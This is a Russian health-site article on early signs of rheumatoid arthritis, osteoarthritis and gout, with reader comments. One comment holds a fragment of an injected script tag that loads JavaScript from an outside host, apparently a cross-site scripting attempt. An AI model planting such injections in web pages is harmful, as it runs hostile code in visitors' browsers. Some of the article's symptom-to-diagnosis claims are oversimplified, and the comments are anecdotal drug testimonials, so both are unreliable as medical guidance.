Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ранние признаки заболеван...  >>  Ранние признаки заболеваний суставов
 
Обратная связь
 

Ранние признаки заболеваний суставов

Размер шрифта
18 октября 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Причины болезней суставов могут быть одинаковыми, но их симптомы похожи не всегда. В этой статье – о некоторых ранних признаках ревматоидного артрита и остеоартроза.

признаки артрита

Что такое ревматоидный артрит

Ревматоидный артрит – это разновидность хронического артрита, который, как правило, поражает суставы с обеих сторон тела. Симметричность поражения является одним из критериев, позволяющих отличить ревматоидный артрит от других видов артрита. Кроме поражения суставов ревматоидный артрит может вызвать патологические изменения в глазах, коже, легких, сердце или нервах. Для ревматоидного артрита характерны такие симптомы: утренняя скованность (более одного часа); отечность; боль; покраснение кожи над суставом и повышение ее температуры.

Что такое остеоартроз

Остеоартроз – это хроническое заболевание суставов, для которого характерно поражение суставных хрящей и других структур сустава. Чаще всего происходит поражение крупных суставов, таких как тазобедренный, коленный, голеностопный, несколько реже в патологический процесс вовлекаются плечевой и локтевой суставы.

Первым симптомом остеоартроза бывает боль в суставах, которая возникает при физической нагрузке. Характерны стартовые боли, появляющиеся в начале движения и исчезающие по мере увеличения активности. По мере прогрессирования заболевания наблюдается деформация суставов с формированием подвывихов.

Ранние признаки

Боль в суставах ночью

Каждый человек имеет индивидуальный порог боли. Но если боль в суставах настолько сильна, что влияет на качество сна и заставляет вас просыпаться среди ночи, это признак остеоартроза.
Боль при остеоартрозе вызвана истончением хряща, что в конечном итоге приводит к трению костей сустава. Да, боль при этом может быть нестерпимой и мешать спать.

Скованность суставов после сна

Этот признак появляется после ночного сна или долгого бездействия, например после просмотра фильма, и является признаком ревматоидного артрита. 

 Внезапная мучительная боль в большом пальце ноги

Внезапная мучительная боль в большом пальце ноги сигнализирует, скорее всего, о приступе подагры, – распространенной формы артрита.

Боль в коленях

Обычно люди испытывают боль в коленях при подъеме по лестнице и, особенно, при спускании вниз, когда у них остеоартроз.
Это состояние усугубляется, если у человека есть лишний вес, т.к. нагрузка на больные суставы возрастает.

 Состояние, похожее на грипп

Гриппозное состояние, сочетающееся со скованностью и болью в суставах, может указывать на ревматоидный артрит, который относится к системным воспалительным заболеваниям, когда в процесс воспаления вовлекается весь организм, в отличие от изолированного воспаления, ограниченного одним или несколькими суставами, как при остеоартрозе.

Уплотнения на пальцах, похожие на шишки

Уплотнения на последних (ногтевых) фалангах кистей рук называются узелками Гебердена, а твердые образования на средних фалангах пальцев – узелками Бушара.
Эти костные уплотнения врачи используют как визуальную информацию для диагностики остеоартроза. 

Трудности с мелкой моторикой рук

Вы не можете вставить ключ в замок, нитку в иголку или застегнуть рубашку? Как правило, это связано с ревматоидным артритом, который поражает мелкие суставы и делает пальцы рук мало подвижными. 
Ревматоидный артрит является «симметричным» заболеванием, т.е. одновременно поражаются суставы обеих рук или ног. 

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

18 октября 2012 в 10:19

Комментарий удален за нарушение Правил общения

2 - SIV_1955

24 октября 2012 в 23:51

Комментарий удален за нарушение Правил общения

3 - Гость

10 декабря 2012 в 18:06

Цитировать   |   Пожаловаться

Я долго пыталась вылечить артрит плеча самостоятельно с помощью разных народных средств. Но когда начало по ночам болеть и второе обратилась в больницу. Врач диагностировал ревматоидный артрит и понеслось. Одни препараты, другие, бады, таблетки, инъекции. Боли прошли только после курса препарата, видимо на самом деле  помогает хрящевой ткани восстанавливаться, так как не только боли утихли, но и появилась возможность завести руку за голову и за спину, чего я не могла сделать последние несколько лет.

4 - Гость

18 февраля 2013 в 00:43

Цитировать   |   Пожаловаться

Гость 10 декабря 2012 в 18:06
Врач диагностировал ревматоидный артрит и понеслось. Одни препараты, другие, бады, таблетки, инъекции.
 У меня та же беда. Остеоартроз коленных суставов. Что не принимала - только временное облегчение.

5 - Гость

24 марта 2013 в 01:20

Цитировать   |   Пожаловаться

Моя свекровь тоже колола 2 курса, пока уже год ничего не беспокоит, но препарат не из дешевых.

6 - Гость

02 июня 2013 в 23:32

Цитировать   |   Пожаловаться

Это такие коварные заболевания, которые так трудно поддаются лечению, не всё лечение идёт на пользу. Мне выписали  дорогой препарат  а в нем столько вредных добавок, но я это только после узнала, когда осложнения в виде аллергии получила.

7 - Гость

11 июня 2013 в 11:05

Цитировать   |   Пожаловаться

Гость 02 июня 2013 в 23:32
Это такие коварные заболевания, которые так трудно поддаются лечению, не всё лечение идёт на пользу. Мне выписали дорогой препарат а в нем столько вредных добавок, но я это только после узнала, когда осложнения в виде аллергии получила
 

8 - Гость

21 июня 2013 в 11:22

Цитировать   |   Пожаловаться

Ага, скорей всего, у меня тоже после приема препарата аллергия пошла, да еще какая.

9 - Гость

15 сентября 2014 в 01:23

Комментарий удален за нарушение Правил общения

10 - zzzzzz

30 июня 2015 в 21:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

1 | 2 Следующая

Статьи

       
Ритм марша лечит болезнь Паркинсона   История пациента. Сергей Викторович   Боль в колене: уколы против боли   Боль в колене: как защитить суставы  
01 ноября 2012Ритм марша лечит болезнь Паркинсона 08 ноября 2012Обычная вишня может спасти от боли в ногах
 
07 мая 2013Удобно готовить на антипригарных покрытиях? Наверное, но скоро вам придется менять сустав! 19 декабря 2012Газированные напитки увеличивают риск артрита
 

Слайдшоу

1
Как сохранить здоровье суставов
Вся правда о ревматоидном артрите
Вся правда об остеоартрозе

Тесты

Есть ли у вас остеопороз?
Есть ли у вас гормональные нарушения
Что вы знаете о мышцах?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.